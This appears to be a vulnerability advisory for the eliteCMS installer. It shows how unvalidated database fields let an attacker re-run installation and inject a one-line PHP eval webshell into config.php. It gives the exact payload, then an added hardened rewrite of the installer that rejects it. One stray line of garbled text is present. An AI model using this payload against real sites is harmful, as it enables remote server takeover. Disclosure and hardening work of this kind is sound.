eliteCMS: installer not locked after installation + one-line webshell written via the installer
Posted 2012-11-18 13:59:27
After installation finishes, eliteCMS's installer is not locked, so an attacker can re-run the installation simply by visiting the installer's URL.

A second vulnerability is that the installer can write a one-line webshell (一句话木马) straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
/ T1 ?5 S. a  |  p% H5 k
Now look at the code that sets these session values:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken with no validation at all.
If the database name POSTed is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
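As an added example (this is not eliteCMS's own code), here is how the step-4 writer could be hardened against both issues in the post: refuse to run once a lock file exists, whitelist each connection parameter instead of copying $_POST into $_SESSION unchecked, and emit the values as PHP string literals with var_export() rather than by interpolating them into a double-quoted template. The lock-file path install.lock, the function names and the validation patterns are assumptions made for this example.

```php
<?php
// Added example, not eliteCMS code: a hardened replacement for the installer's
// step-4 config writer. Lock-file path, function names and regexes are assumptions.
declare(strict_types=1);

const INSTALL_LOCK = __DIR__ . '/install.lock';                  // assumed lock-file location
const CONFIG_FILE  = __DIR__ . '/../admin/includes/config.php';  // path used by the installer

// Fix 1: once installation has completed, step 4 must refuse to run again.
function installerIsLocked(): bool
{
    return file_exists(INSTALL_LOCK);
}

// Fix 2a: whitelist each value instead of trusting $_POST.
function validateDbParams(array $in): array
{
    $rules = [
        'DB_SERVER' => '/\A[A-Za-z0-9.\-]{1,253}(:[0-9]{1,5})?\z/', // host or host:port
        'DB_NAME'   => '/\A[A-Za-z0-9_]{1,64}\z/',                  // MySQL identifier chars only
        'DB_USER'   => '/\A[A-Za-z0-9_.\-]{1,32}\z/',
        'DB_PASS'   => '/\A[\x20-\x7E]{0,128}\z/',                   // printable ASCII; quoting handled below
    ];
    $out = [];
    foreach ($rules as $key => $re) {
        $v = $in[$key] ?? null;
        if (!is_string($v) || preg_match($re, $v) !== 1) {
            throw new InvalidArgumentException("Invalid value for $key");
        }
        $out[$key] = $v;
    }
    return $out;
}

// Fix 2b: render every value as a PHP string literal via var_export(), so a quote,
// "?>" or "<?php" in the input can never leave the literal. No closing "?>" is emitted.
function renderConfig(array $params): string
{
    $lines = ['<?php'];
    foreach ($params as $key => $v) {
        $lines[] = 'define(' . var_export($key, true) . ', ' . var_export($v, true) . ');';
    }
    return implode("\n", $lines) . "\n";
}

function writeConfigOnce(array $post): void
{
    if (installerIsLocked()) {
        http_response_code(403);
        exit('Installer is locked; remove install.lock to run it again.');
    }
    $params = validateDbParams($post);

    // Write to a temp file and rename, so a half-written config.php is never loaded.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, renderConfig($params), LOCK_EX) === false
        || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('Could not write ' . CONFIG_FILE);
    }
    chmod(CONFIG_FILE, 0640);

    // Create the lock last, after the config is in place.
    file_put_contents(INSTALL_LOCK, date('c') . "\n", LOCK_EX);
}

// Demonstration with the payload from the post (constructed input): rejected before anything is written.
$attack = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'root',
    'DB_PASS'   => 'secret',
];
try {
    validateDbParams($attack);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}

// Even if a quote or tag reached the writer, var_export() keeps it inside the literal.
echo renderConfig(['DB_NAME' => 'x"?><?php evil();?><?php']);
```

The whitelist is the primary control and var_export() is defence in depth: a MySQL database name never legitimately contains a quote or a PHP tag, so rejecting the request is correct, and the literal-rendering step covers fields such as DB_PASS where those characters are allowed. The lock file addresses the re-installation issue; deleting or access-restricting the installer directory after a successful install is the usual complementary step.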